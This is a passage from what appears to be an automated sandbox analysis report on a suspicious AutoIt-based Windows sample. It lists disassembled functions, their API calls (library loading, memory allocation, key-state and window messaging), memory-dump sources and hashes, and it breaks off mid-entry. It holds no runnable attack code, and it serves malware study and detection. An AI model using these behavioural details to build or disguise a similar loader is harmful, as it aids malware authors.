                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 7281a4f777936e06ac205cd9b53cfe6b8452754bec8093e56af4b3a50fb619b5
                    • Instruction ID: 38b671bae27c204335e7bae8cf948ded69e9ec2f691a7164a3528be420f03992
                    • Opcode Fuzzy Hash: 7281a4f777936e06ac205cd9b53cfe6b8452754bec8093e56af4b3a50fb619b5
                    • Instruction Fuzzy Hash: 40214F3160460AEBDF208F65EC827397BB8FF24350F21C16EE48AC6191EB3091E29324
                    Function 00C7C707 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscmp
                    • String ID:
                    • API String ID: 856254489-0
                    • Opcode ID: f28a7cf14a6d638c3f82821e16e842b9fa6e9f4b4c7eb3b1a046eb5b5f588ead
                    • Instruction ID: 5c0172ca7d64ae130974d02253c63763ff06b4b1c1ea01c59ca1812cde62e610
                    • Opcode Fuzzy Hash: f28a7cf14a6d638c3f82821e16e842b9fa6e9f4b4c7eb3b1a046eb5b5f588ead
                    • Instruction Fuzzy Hash: D811A572900519DBCB14EBA9DCC19EEF778EF54360F50812AE829A7190EB309E05EB90
                    Function 00C74F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C74D13: FreeLibrary.KERNEL32(00000000,?), ref: 00C74D4D
                      • Part of subcall function 00C9548B: __wfsopen.LIBCMT ref: 00C95496
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00D362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C74F6F
                      • Part of subcall function 00C74CC8: FreeLibrary.KERNEL32(00000000), ref: 00C74D02
                      • Part of subcall function 00C74DD0: _memmove.LIBCMT ref: 00C74E1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: 8b9de183d514ccf7d4edc911e1ebe16020acc423bc178f761d074289ca8fa04e
                    • Instruction ID: df6c5cb0ffdc4b59176669e8fb314133a81861a35f76654b1d63b9665ead153a
                    • Opcode Fuzzy Hash: 8b9de183d514ccf7d4edc911e1ebe16020acc423bc178f761d074289ca8fa04e
                    • Instruction Fuzzy Hash: 3811E731700209ABCB19EF74CC06B6E77A49F41700F10C42DF546A61C1DB719A05ABA0
                    Function 00CB01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 5729521f6dbb17dbf27a72a91318b123e22bac4c190bf7146fee4e0eb00cbfbf
                    • Instruction ID: 45ad2e0f1b7fed665b2a3791c95cfc605c706dcd2dd4dd07da5114808af3b6f0
                    • Opcode Fuzzy Hash: 5729521f6dbb17dbf27a72a91318b123e22bac4c190bf7146fee4e0eb00cbfbf
                    • Instruction Fuzzy Hash: F4210FB4508341DFCB24DF24C485B2ABBE0BF88304F08896CE9AA47761D732E859DB53
                    Function 00C7C6E9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscmp
                    • String ID:
                    • API String ID: 856254489-0
                    • Opcode ID: 3186f652c77cbac9044771bb4c19ac5eb40132ca579ea4fe75253f1ff4d1d35f
                    • Instruction ID: b9e3a8b28e1c68e9c83c4c79b19fc47dd92e7178c9cb765812b824692fae8afd
                    • Opcode Fuzzy Hash: 3186f652c77cbac9044771bb4c19ac5eb40132ca579ea4fe75253f1ff4d1d35f
                    • Instruction Fuzzy Hash: E601F171D042469FDB154F688880AEAFFB4EF46310F0580AAD828EB261E7308D41CB80
                    Function 00C94A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    • __lock_file.LIBCMT ref: 00C94AD6
                      • Part of subcall function 00C98D68: __getptd_noexit.LIBCMT ref: 00C98D68
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: aa77eaafa5b0efc0f4a27c3feec0c98faff16dba30bfb8b309104a1d7f774123
                    • Instruction ID: ddcbf024a1493e20f0b8f35e3d4c3cab0e535a92480477b664c9e722a469e4b6
                    • Opcode Fuzzy Hash: aa77eaafa5b0efc0f4a27c3feec0c98faff16dba30bfb8b309104a1d7f774123
                    • Instruction Fuzzy Hash: C7F0AF31940209ABDF65AF748C0EBAE36A1AF01726F088514F424AB1D1CF788A56FF55
                    Function 00C74FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNEL32(?,?,00D362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C74FDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: a70f239e06bc19b9e7e119dd66c30604394d2b12b9f19c89747243a6424ac5d4
                    • Instruction ID: a8c551c8490846bd27b832e4c39fae8ac3738a147620cd21746d30dc7f6dbe77
                    • Opcode Fuzzy Hash: a70f239e06bc19b9e7e119dd66c30604394d2b12b9f19c89747243a6424ac5d4
                    • Instruction Fuzzy Hash: ABF03971105712CFCB389FA5E494926BBE1BF04329321CA3EE1EA82610C731A940DF40
                    Function 00C909D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C909F4
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: fd1eb961d9a58ab1471540b9d3e2ce0278b871940b8c7d887c51b436ac50d2e0
                    • Instruction ID: 55e4ca92c6acaa6cb78bdbe06a2c8f3662f7acfbea1d98e29631e66ac91f6d21
                    • Opcode Fuzzy Hash: fd1eb961d9a58ab1471540b9d3e2ce0278b871940b8c7d887c51b436ac50d2e0
                    • Instruction Fuzzy Hash: F1E0CD7690422C57C720D69C9C05FFA77EDDF89790F0441B5FC0CD7204D9609C818691
                    Function 00CD9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction ID: fb9cd4e377558c58338361df3b366096ba59dbd1126b3b9f7d8a5e141b17003c
                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction Fuzzy Hash: B1E09AB0204B009FDB398A24D814BE373E0EB06319F00081DF2AA83382EB62B8418B59
                    Function 031408E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?), ref: 031408EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                    • Instruction ID: df444eace0e66d774c796f1c818d4989bdb1ad741b63c1c86f210ae06627ebca
                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                    • Instruction Fuzzy Hash: 30E086B191520CDBD714CBB9C9046A9B3A8D74C310F004654E619C3180D634C9409654
                    Function 031408B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?), ref: 031408BB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                    • Instruction ID: 0a2fcf64b85fa52e25655135bbef49f6159d1da686162f5bbf4f18c2e9f29813
                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                    • Instruction Fuzzy Hash: 5DD0A730D0620DEBCB10CFB59D04ADAB3ACDB0C320F004754FE15D3280D73199409790
                    Function 00C9548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: facd707aebfd671fb7faa2a4fcb214ff37fb19bbb7f64c5cda8fbc982a4360ee
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: 27B0927A84020C77DE422E82EC02A593B199B40678F808020FB0C28162A673A6A0A689
                    Function 00C90E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: 0511858752256833e0c1876cd2ac9533e1d743854c6c883261e991eca1d1bb9b
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: 9831E271A00105DFCB18DF59C488969F7A6FF59300B788AA5E89ACB651DB31EEC1CBC0
                    Function 00CC7652 Relevance: 1.3, APIs: 1, Instructions: 48stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CC758C,80070057,?,?), ref: 00CC7698
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: lstrcmpi
                    • String ID:
                    • API String ID: 1586166983-0
                    • Opcode ID: a0d721074449ff6b14dc1ded47dcada7c09ff819a36e52cd28832c3d66746c34
                    • Instruction ID: 0ab156948169958d839bb7264eee483b5898621ce2f71f1c0a81d5f64d5514d1
                    • Opcode Fuzzy Hash: a0d721074449ff6b14dc1ded47dcada7c09ff819a36e52cd28832c3d66746c34
                    • Instruction Fuzzy Hash: 3B017CB2601604ABDB109F68DC48FAE7BADEF497A1F24012CFD04D2221E771DE41DBA0
                    Function 0314229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 031422B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction ID: 6c3c1bca9b7eeeeff660752c286059c30010e535ed357a1793da84fcec7d70e1
                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction Fuzzy Hash: FBE0BF7494010EEFDB00EFE8D5496DE7BB4EF04311F1005A1FD05D7680DB309E548A62
                    Function 031422A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 031422B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: b586f96b720a057a2142336a185fe785168c90ddf2ad7644f5492fc6b47f1a28
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: 3AE0BF7494010E9FDB00EFA8D54969E7BB4EF04301F1005A1FD0192280D73099508A62

                    Non-executed Functions

                    Function 00CFCDAC Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 637windowkeyboardnativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00CFCE50
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CFCE91
                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00CFCED6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CFCF00
                    • SendMessageW.USER32 ref: 00CFCF29
                    • _wcsncpy.LIBCMT ref: 00CFCFA1
                    • GetKeyState.USER32(00000011), ref: 00CFCFC2
                    • GetKeyState.USER32(00000009), ref: 00CFCFCF
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CFCFE5
                    • GetKeyState.USER32(00000010), ref: 00CFCFEF
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CFD018
                    • SendMessageW.USER32 ref: 00CFD03F
                    • SendMessageW.USER32(?,00001030,?,00CFB602), ref: 00CFD145
                    • SetCapture.USER32(?), ref: 00CFD177
                    • ClientToScreen.USER32(?,?), ref: 00CFD1DC
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CFD203
                    • ReleaseCapture.USER32 ref: 00CFD20E
                    • GetCursorPos.USER32(?), ref: 00CFD248
                    • ScreenToClient.USER32(?,?), ref: 00CFD255
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CFD2B1
                    • SendMessageW.USER32 ref: 00CFD2DF
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CFD31C
                    • SendMessageW.USER32 ref: 00CFD34B
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CFD36C
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CFD37B
                    • GetCursorPos.USER32(?), ref: 00CFD39B
                    • ScreenToClient.USER32(?,?), ref: 00CFD3A8
                    • GetParent.USER32(?), ref: 00CFD3C8
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CFD431
                    • SendMessageW.USER32 ref: 00CFD462
                    • ClientToScreen.USER32(?,?), ref: 00CFD4C0
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CFD4F0
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CFD51A
                    • SendMessageW.USER32 ref: 00CFD53D
                    • ClientToScreen.USER32(?,?), ref: 00CFD58F
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CFD5C3
                      • Part of subcall function 00C725DB: GetWindowLongW.USER32(?,000000EB), ref: 00C725EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 00CFD65F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F
                    • API String ID: 302779176-4164748364
                    • Opcode ID: 8f02187ae2f840751af04cfb34e4c9e89b12a7c5b58b35aad103b78c25fb6b8a
                    • Instruction ID: 02e32a61ffc58adb78ecfca08f81fb39f1fbba7f4a7e41bf8276ad15a526575a
                    • Opcode Fuzzy Hash: 8f02187ae2f840751af04cfb34e4c9e89b12a7c5b58b35aad103b78c25fb6b8a
                    • Instruction Fuzzy Hash: DE429974204249AFC765CF28C988BBABBE6FF48314F14451DF6A6872A0C731D951DBA3
                    Function 00CF804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CF873F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: dc736caff66681a1e7f3b743a226f523575f807a6b424a729d389391c5fca15d
                    • Instruction ID: 047d8fb866a0ff4b5e7a7f80e85cb186063f050e441b40cefc2580f83cac27ad
                    • Opcode Fuzzy Hash: dc736caff66681a1e7f3b743a226f523575f807a6b424a729d389391c5fca15d
